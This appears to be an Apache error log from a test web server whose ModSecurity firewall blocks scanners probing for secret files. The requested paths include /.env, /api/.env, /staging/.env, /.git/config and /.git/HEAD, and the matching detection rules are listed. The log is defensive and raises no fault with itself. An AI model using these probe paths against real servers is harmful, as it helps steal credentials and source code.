[Mon Oct 14 21:31:35.169733 2024] [:error] [pid 2593075] [client 92.118.39.244:38712] [client 92.118.39.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zw1xl5nqywwQvm5ARu_TXgAAAAA"]
[Mon Oct 14 21:31:35.323493 2024] [:error] [pid 2593079] [client 92.118.39.244:38722] [client 92.118.39.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Zw1xl1NFOhR0zaqiPAu2rgAAAAQ"]
[Mon Oct 14 21:31:35.324116 2024] [:error] [pid 2593079] [client 92.118.39.244:38722] [client 92.118.39.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Zw1xl1NFOhR0zaqiPAu2rgAAAAQ"]
[Mon Oct 14 21:31:35.324606 2024] [:error] [pid 2593079] [client 92.118.39.244:38722] [client 92.118.39.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Zw1xl1NFOhR0zaqiPAu2rgAAAAQ"]
[Tue Oct 15 08:41:36.191580 2024] [authz_core:error] [pid 2616034] [client 35.226.250.46:53868] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/
[Tue Nov 19 10:09:59.605906 2024] [:error] [pid 3412346] [client 109.205.213.242:37516] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzxV5-ceEVorFlMiPPeyngAAAAQ"]
[Tue Nov 19 10:09:59.609546 2024] [:error] [pid 3412346] [client 109.205.213.242:37516] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzxV5-ceEVorFlMiPPeyngAAAAQ"]
[Tue Nov 19 10:09:59.609979 2024] [:error] [pid 3412346] [client 109.205.213.242:37516] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZzxV5-ceEVorFlMiPPeyngAAAAQ"]
[Tue Nov 19 10:10:01.857031 2024] [:error] [pid 3412343] [client 109.205.213.242:43930] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZzxV6d0YIkxJbgtl7qSjsgAAAAE"]
[Tue Nov 19 10:10:01.857528 2024] [:error] [pid 3412343] [client 109.205.213.242:43930] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZzxV6d0YIkxJbgtl7qSjsgAAAAE"]
[Tue Nov 19 10:10:01.857914 2024] [:error] [pid 3412343] [client 109.205.213.242:43930] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZzxV6d0YIkxJbgtl7qSjsgAAAAE"]
[Tue Nov 19 10:10:02.428629 2024] [:error] [pid 3412345] [client 109.205.213.242:43940] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "ZzxV6h-0-k__jDvxKhmSAAAAAAM"]
[Tue Nov 19 10:10:02.428935 2024] [:error] [pid 3412345] [client 109.205.213.242:43940] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "ZzxV6h-0-k__jDvxKhmSAAAAAAM"]
[Tue Nov 19 10:10:02.430560 2024] [:error] [pid 3412345] [client 109.205.213.242:43940] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "ZzxV6h-0-k__jDvxKhmSAAAAAAM"]
[Tue Nov 19 10:10:03.022369 2024] [:error] [pid 3412342] [client 109.205.213.242:43946] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "ZzxV66SynMOiZgYzVSBRbwAAAAA"]
[Tue Nov 19 10:10:03.022744 2024] [:error] [pid 3412342] [client 109.205.213.242:43946] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "ZzxV66SynMOiZgYzVSBRbwAAAAA"]
[Tue Nov 19 10:10:03.022978 2024] [:error] [pid 3412342] [client 109.205.213.242:43946] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "ZzxV66SynMOiZgYzVSBRbwAAAAA"]
[Tue Nov 19 10:10:03.498935 2024] [:error] [pid 3412756] [client 109.205.213.242:43954] [client 109.205.213.242] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "ZzxV6ydYloVprdQyTvVpWwAAAAY"]
[Tue Nov 19 10:10:03.499237 2024] [:error] [pid 3412756] [client 109.205.213.242:43954] [client 109.205.213.242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "ZzxV6ydYloVprdQyTvVpWwAAAAY"]
[Tue Nov 19 10:10:03.499454 2024] [:error] [pid 3412756] [client 109.205.213.242:43954] [client 109.205.213.242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "ZzxV6ydYloVprdQyTvVpWwAAAAY"]
[Mon Dec 02 01:01:49.394413 2024] [:error] [pid 3693175] [client 15.229.25.225:39348] [client 15.229.25.225] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z0z47Q8tcmbIz4p1DmS1ZwAAAAY"]
[Mon Dec 02 01:01:49.399862 2024] [:error] [pid 3693175] [client 15.229.25.225:39348] [client 15.229.25.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z0z47Q8tcmbIz4p1DmS1ZwAAAAY"]
[Mon Dec 02 01:01:49.400258 2024] [:error] [pid 3693175] [client 15.229.25.225:39348] [client 15.229.25.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z0z47Q8tcmbIz4p1DmS1ZwAAAAY"]
[Tue Dec 03 02:23:54.896511 2024] [:error] [pid 3716015] [client 54.226.202.34:42728] [client 54.226.202.34] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/"] [unique_id "Z05dqiy0E66TN4iVGExjXAAAABU"]
[Tue Dec 03 02:23:54.897303 2024] [:error] [pid 3716015] [client 54.226.202.34:42728] [client 54.226.202.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/"] [unique_id "Z05dqiy0E66TN4iVGExjXAAAABU"]
[Tue Dec 03 02:23:54.897825 2024] [:error] [pid 3716015] [client 54.226.202.34:42728] [client 54.226.202.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/"] [unique_id "Z05dqiy0E66TN4iVGExjXAAAABU"]
[Mon Dec 09 21:55:09.396742 2024] [:error] [pid 3848894] [client 18.156.35.7:53924] [client 18.156.35.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1dZLTi8sY-iB7fqQ4JdMQAAAAw"]
[Mon Dec 09 21:55:09.399699 2024] [:error] [pid 3848894] [client 18.156.35.7:53924] [client 18.156.35.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1dZLTi8sY-iB7fqQ4JdMQAAAAw"]
[Mon Dec 09 21:55:09.400214 2024] [:error] [pid 3848894] [client 18.156.35.7:53924] [client 18.156.35.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1dZLTi8sY-iB7fqQ4JdMQAAAAw"]
[Sat Jan 04 09:39:15.825698 2025] [:error] [pid 247597] [client 91.214.64.5:55052] [client 91.214.64.5] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3jzs8sBzKMwURvfy8Ad2AAAAAg"], referer: http://autumnus.test.indacotrentino.com:80/.env
[Sat Jan 04 09:39:15.829549 2025] [:error] [pid 247597] [client 91.214.64.5:55052] [client 91.214.64.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3jzs8sBzKMwURvfy8Ad2AAAAAg"], referer: http://autumnus.test.indacotrentino.com:80/.env
[Sat Jan 04 09:39:15.830040 2025] [:error] [pid 247597] [client 91.214.64.5:55052] [client 91.214.64.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3jzs8sBzKMwURvfy8Ad2AAAAAg"], referer: http://autumnus.test.indacotrentino.com:80/.env
[Sun Jan 05 19:10:13.105656 2025] [:error] [pid 265380] [client 45.130.203.210:7253] [client 45.130.203.210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3rLBbPEouUoUrRufn4V5wAAAA0"]
[Sun Jan 05 19:10:13.105959 2025] [:error] [pid 265380] [client 45.130.203.210:7253] [client 45.130.203.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3rLBbPEouUoUrRufn4V5wAAAA0"]
[Sun Jan 05 19:10:13.106196 2025] [:error] [pid 265380] [client 45.130.203.210:7253] [client 45.130.203.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3rLBbPEouUoUrRufn4V5wAAAA0"]
[Mon Jan 06 00:47:04.820816 2025] [authz_core:error] [pid 284125] [client 188.166.229.54:48744] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/laravel-filemanager
[Mon Jan 06 11:18:29.932992 2025] [:error] [pid 287919] [client 45.130.203.209:47551] [client 45.130.203.209] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3ut9exxcoaa2oN2JtdEagAAAAg"]
[Mon Jan 06 11:18:29.933683 2025] [:error] [pid 287919] [client 45.130.203.209:47551] [client 45.130.203.209] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3ut9exxcoaa2oN2JtdEagAAAAg"]
[Mon Jan 06 11:18:29.934195 2025] [:error] [pid 287919] [client 45.130.203.209:47551] [client 45.130.203.209] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z3ut9exxcoaa2oN2JtdEagAAAAg"]
[Mon Jan 06 12:04:29.339577 2025] [:error] [pid 286454] [client 45.130.203.237:40937] [client 45.130.203.237] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3u4vflZ_yXasWLGMKbNAwAAAAA"]
[Mon Jan 06 12:04:29.339909 2025] [:error] [pid 286454] [client 45.130.203.237:40937] [client 45.130.203.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3u4vflZ_yXasWLGMKbNAwAAAAA"]
[Mon Jan 06 12:04:29.340142 2025] [:error] [pid 286454] [client 45.130.203.237:40937] [client 45.130.203.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z3u4vflZ_yXasWLGMKbNAwAAAAA"]
